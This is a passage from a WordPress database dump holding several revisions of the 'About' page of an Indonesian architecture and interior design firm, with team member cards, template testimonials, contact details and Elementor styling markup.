src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:59:35','2023-09-22 08:59:35','',38,'https://bauhaus.futuremediatrix.com/?p=4880',0,'revision','',0),(4881,3,'2023-09-22 08:59:35','2023-09-22 08:59:35','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								John Alan							</h2>\n		<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.</p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Challenges in deploying\ninterior design applications</h2>		\n							Get your quote or WhatsApp: 						\n					<ul>\n								<li>\n																					<a href=\"tel:082297775589 \">\n													0822 9777 5589												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:59:35','2023-09-22 08:59:35','',38,'https://bauhaus.futuremediatrix.com/?p=4881',0,'revision','',0),(4882,3,'2023-09-22 08:59:35','2023-09-22 08:59:35','<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-get-to-know-us.jpg\" alt=\"\">\n						<h2>Architect</h2>\n														<h2>\n								John Alan							</h2>\n		<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.</p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi perencanaan & interior design\n									</li>\n								<li>\n										Penyusunan Rencana Anggaran Belanja\n									</li>\n								<li>\n										Produksi furniture dan pekerjaan sipil\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"288\" height=\"286\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan.jpg 288w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/john_allan-150x150.jpg 150w\" sizes=\"(max-width: 288px) 100vw, 288px\" />															\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h3>John Alan</h3>		\n		CO - FOUNDER		\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking about BauHaus							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/avatar.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n			<h2>Let\'s turn your ideas\ninto reality</h2>		\n							Get your quote or WhatsApp: 						\n					<ul>\n								<li>\n																					<a href=\"tel:082297775589 \">\n													0822 9777 5589												</a>\n																			</li>\n											</ul>\n			<a href=\"https://demo.ovatheme.com/retirio/contact\" role=\"button\">\n						Contact with us\n					</a>\n					0\n				    			        						<h4>\n							Project Completed						</h4>\n					0\n				    			        						<h4>\n							Architectures						</h4>\n					0\n				    			        						<h4>\n							Service providing						</h4>\n					0\n				    			        						<h4>\n							Happy customers						</h4>\n							<h3>Our Architects</h3>\n														<h2>\n								Our expert team							</h2>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-06.jpg\" alt=\"Aleesha brown\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/aleesha-brown/\">\n										Aleesha brown										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg\" alt=\"Kevin martin\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/kevin-martin/\">\n										Kevin martin										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg\" alt=\"Sarah Albert\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/sarah-albert/\">\n										Sarah Albert										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg\" alt=\"David Cooper\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/david-cooper/\">\n										David Cooper										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg\" alt=\"Christine eve\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a 